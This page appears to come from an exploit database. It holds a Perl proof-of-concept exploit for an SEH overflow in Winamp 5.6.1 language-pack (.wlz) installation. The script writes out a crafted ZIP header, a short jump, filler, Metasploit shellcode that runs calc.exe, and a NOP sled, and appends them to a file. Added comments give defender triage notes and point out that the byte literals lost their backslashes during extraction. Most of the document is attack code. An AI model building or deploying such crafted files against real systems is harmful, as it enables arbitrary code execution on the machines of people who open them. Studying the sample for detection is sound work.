Home / exploits Winamp 5.6.1 Install Language SEH Overflow
Posted on 12 April 2011
#!/usr/bin/perl
# ---------
# Winamp <=5.6.1 Install Language SEH Exploit
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
# ---------
# Winamp 5.6.1 installs a new language from a (.wlz) file; the author states
# that a crafted (.wlz) can carry an SEH overwrite that fires during install.
#
# Purpose: proof-of-concept generator. It concatenates a fixed header, filler
# and a demonstration payload, then appends the result to ar-dz.wlz in the
# current directory. It takes no arguments and reads no input.
#
# NOTE(review): as extracted on this page the string literals contain no
# backslashes ("x50x4b..."), so Perl would treat them as plain text rather
# than bytes. The byte-level notes below read them as the hex pairs they
# spell out.
#
# Triage notes for defenders:
#   - Affected versions are as claimed in the header above (Winamp <= 5.6.1);
#     no vendor advisory or fixed version is given on this page.
#   - Layout of this sample: header, 4 bytes, 321 x 0x41, 4 bytes, payload,
#     51 x 0x90. A language pack whose "auth.lng" entry opens with a long
#     0x41 run and ends with a 0x90 run matches that layout.
#   - SEH-overwrite samples of this kind are what SafeSEH, SEHOP and DEP are
#     meant to stop; confirm they are enabled on hosts still running the
#     affected version, and treat .wlz files from untrusted sources as
#     untrusted input.

# Read as bytes, this is a ZIP local-file header: signature 50 4b 03 04,
# both size fields 0x2800, name length 8, extra length 0, then the 8-byte
# entry name "auth.lng". The declared sizes do not match the 604 bytes this
# script places after the header, an inconsistency a scanner can flag.
my $header = "x50x4bx03x04x14x00x00x00x00x00x2fx92x7bx3dxd3x55".
"x30x92x00x28x00x00x00x28x00x00x08x00x00x00x61x75".
"x74x68x2ex6cx6ex67";
my $jump = "xebx06x90x90" ; # short jump
my $junk = "x41" x 321; # Buffer
my $nops = "x90" x 51; # Nopsled
# windows/exec - 224 bytes (http://www.metasploit.com)
# EXITFUNC=seh, CMD=calc.exe , Encoder: x86/call4_dword_xor
# Per the author's note above this is a stock Metasploit payload that only
# launches calc.exe, i.e. a harmless demonstration of code execution. The
# literal below is 16 rows of 14 byte pairs, matching the stated 224 bytes.
my $shell =
"x33xc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" .
"x0ex26x7ex29x35x83xeexfcxe2xf4xdax96xa0x35" .
"x26x7ex49xbcxc3x4fxfbx51xadx2cx19xbex74x72" .
"xa2x67x32xf5x5bx1dx29xc9x63x13x17x81x18xf5" .
"x8ax42x48x49x24x52x09xf4xe9x73x28xf2xc4x8e" .
"x7bx62xadx2cx39xbex64x42x28xe5xadx3ex51xb0" .
"xe6x0ax63x34xf6x2exa2x7dx3exf5x71x15x27xad" .
"xcax09x6fxf5x1dxbex27xa8x18xcax17xbex85xf4" .
"xe9x73x28xf2x1ex9ex5cxc1x25x03xd1x0ex5bx5a" .
"x5cxd7x7exf5x71x11x27xadx4fxbex2ax35xa2x6d" .
"x3ax7fxfaxbex22xf5x28xe5xafx3ax0dx11x7dx25" .
"x48x6cx7cx2fxd6xd5x7ex21x73xbex34x95xafx68" .
"x4cx7fxa4xb0x9fx7ex29x35x76x16x18xbex49xf9" .
"xd6xe0x9dx80x27x07xccx16x8fxa0x9bxe3xd6xe0" .
"x1ax78x55x3fxa6x85xc9x40x23xc5x6ex26x54x11" .
"x43x35x75x81xfcx56x47x12x4ax1bx43x06x4cx35";
# Final file content, in order: header, jump, filler, jump, payload, NOP run.
my $exploit = $header.$jump.$junk.$jump.$shell.$nops;
# Two-argument open on a bareword handle with the mode embedded in the
# filename string; '>>' appends to any existing ar-dz.wlz. The return values
# of open, print and close are not checked.
open(myfile,'>>ar-dz.wlz');
print myfile $exploit;
close (myfile);
# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans
